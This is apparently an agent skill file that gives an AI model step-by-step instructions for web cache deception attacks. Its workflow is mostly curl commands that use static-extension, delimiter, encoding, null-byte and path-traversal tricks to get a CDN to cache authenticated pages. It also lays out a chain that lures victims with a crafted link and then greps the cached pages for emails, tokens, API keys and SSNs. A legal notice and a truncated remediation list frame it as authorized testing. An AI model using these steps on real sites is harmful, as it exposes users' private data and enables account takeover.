performing-web-cache-deception-attack
Execute web cache deception attacks by exploiting path normalization discrepancies between CDN caching layers and origin servers to cache and retrieve sensitive authenticated content.
What this skill does
# Performing Web Cache Deception Attack ## When to Use - When testing applications behind CDNs or reverse proxies (Cloudflare, Akamai, Varnish, Nginx) - During assessment of authenticated page caching behavior - When evaluating path normalization differences between caching and origin layers - During bug bounty hunting on applications with aggressive caching policies - When testing for sensitive data exposure through cache layer misconfiguration ## Prerequisites - Understanding of HTTP caching mechanisms (Cache-Control, Vary, Age headers) - Knowledge of CDN path normalization and cache key construction - Burp Suite for intercepting and crafting requests - Two browser sessions (authenticated victim and unauthenticated attacker) - Understanding of URL path parsing differences across technologies - Familiarity with common CDN platforms (Cloudflare, Akamai, Fastly, AWS CloudFront) > **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. ## Workflow ### Step 1 — Identify Caching Layer and Behavior ```bash # Determine if a caching layer exists curl -I http://target.com/account/profile # Look for: X-Cache, CF-Cache-Status, Age, Via, X-Varnish headers # Check caching rules for static extensions curl -I "http://target.com/static/style.css" # Look for: X-Cache: HIT, CF-Cache-Status: HIT, Age: >0 # Identify which extensions are cached for ext in css js png jpg gif svg ico woff woff2 pdf; do echo -n "$ext: " curl -sI "http://target.com/test.$ext" | grep -i "x-cache\|cf-cache" done ``` ### Step 2 — Test Path-Based Cache Deception ```bash # Classic web cache deception: append static extension to dynamic URL # Victim visits: http://target.com/account/profile/nonexistent.css # If origin returns profile page and CDN caches it based on .css extension: # Step 1: As victim (authenticated), visit: curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css" # Step 2: As attacker (unauthenticated), request same URL: curl "http://target.com/account/profile/anything.css" # If victim's profile data is returned, cache deception is confirmed # Test various extensions for ext in css js png jpg svg ico woff2; do curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null sleep 2 echo -n "$ext: " curl -s "http://target.com/account/profile/x.$ext" | head -c 200 echo done ``` ### Step 3 — Exploit Delimiter-Based Discrepancies ```bash # Use path delimiters that CDN and origin interpret differently # Semicolon delimiter (ignored by CDN, processed by origin) curl -b "session=VICTIM" "http://target.com/account/profile;anything.css" # Encoded characters curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css" curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css" # Null byte injection curl -b "session=VICTIM" "http://target.com/account/profile%00.css" # Fragment identifier abuse curl -b "session=VICTIM" "http://target.com/account/profile%23.css" # Dot segment normalization curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile" ``` ### Step 4 — Test Normalization Discrepancies ```bash # Path traversal normalization differences # CDN normalizes: /account/profile/../static/x.css -> /static/x.css (cached) # Origin sees: /account/profile (dynamic page returned) curl -b "session=VICTIM" "http://target.com/static/../account/profile" # CDN may cache as /account/profile if it normalizes differently than origin # Encoded path traversal curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile" # Case sensitivity differences curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS" # Double-encoded paths curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css" ``` ### Step 5 — Exploit Cache Key Manipulation ```bash # Identify cache key components # CDN may use: scheme + host + path (excluding query string) # Test if query string affects caching curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css" # Test if the CDN uses the full path or normalized path as cache key curl -b "session=VICTIM" "http://target.com/account/profile/./style.css" curl "http://target.com/account/profile/./style.css" # Check if cached # Header-based cache key manipulation curl -b "session=VICTIM" -H "X-Original-URL: /account/profile" \ "http://target.com/static/cached.css" ``` ### Step 6 — Verify and Document the Attack ```bash # Full attack chain: # 1. Craft malicious URL: http://target.com/account/profile/x.css # 2. Send URL to victim (via social engineering, email, etc.) # 3. Victim clicks link while authenticated # 4. CDN caches the authenticated response # 5. Attacker requests the same URL without authentication # 6. CDN serves cached authenticated content to attacker # Verify cache status curl -I "http://target.com/account/profile/x.css" # Confirm: X-Cache: HIT or CF-Cache-Status: HIT # Check what sensitive data is exposed curl -s "http://target.com/account/profile/x.css" | grep -i "email\|name\|token\|api_key\|ssn" ``` ## Key Concepts | Concept | Description | |---------|-------------| | Cache Deception | Tricking CDN into caching authenticated dynamic content as static resource | | Path Normalization | How CDN and origin differently resolve path segments (../, ;, encoded chars) | | Cache Key | The identifier CDN uses to store/retrieve cached responses (typically URL path) | | Static Extension Trick | Appending .css/.js/.png to dynamic URLs to trigger caching behavior | | Delimiter Discrepancy | Characters (;, ?, #) interpreted differently by cache vs. origin server | | Cache Poisoning vs Deception | Poisoning modifies cache for all users; deception caches specific victim data | | Vary Header | HTTP header controlling which request attributes affect cache key | ## Tools & Systems | Tool | Purpose | |------|---------| | Burp Suite | HTTP proxy for crafting cache deception requests | | curl | Command-line testing of cache behavior and response headers | | Web Cache Vulnerability Scanner | Automated tool for detecting cache deception/poisoning | | Param Miner | Burp extension for discovering unkeyed cache parameters | | Cloudflare Diagnostics | Analyzing CF-Cache-Status and cf-ray headers | | Varnish CLI | Direct cache inspection for Varnish-based setups | ## Common Scenarios 1. **Profile Data Theft** — Cache authenticated user profile pages containing PII (email, address, phone) by appending .css extension to profile URLs 2. **API Token Exposure** — Cache API dashboard pages showing tokens and secrets through path manipulation on CDN 3. **Account Takeover** — Cache pages containing session tokens or CSRF tokens, then use stolen tokens for account takeover 4. **Financial Data Exposure** — Cache banking or payment pages showing account balances and transaction history 5. **Admin Panel Caching** — Cache admin pages accessible through delimiter-based path confusion on CDN ## Output Format ``` ## Web Cache Deception Report - **Target**: http://target.com - **CDN**: Cloudflare - **Vulnerability**: Path-based cache deception via static extension appending ### Cache Behavior Analysis | Extension | Cached | Cache-Control | TTL | |-----------|--------|---------------|-----| | .css | Yes | public, max-age=86400 | 24h | | .js | Yes | public, max-age=86400 | 24h | | .png | Yes | public, max-age=604800 | 7d | ### Exploitation Results | Victim URL | Cached Data | Sensitive Fields | |-----------|-------------|-----------------| | /account/profile/x.css | Full profile page | Email, Name, API Key | | /account/settings/x.js | Settings page | 2FA backup codes | ### Remediation - Configure CDN to respect Cache-Control: no-store on dynamic pages - Implement Vary: Cookie header on authenticated endpoints - Use path-based routing rules that r
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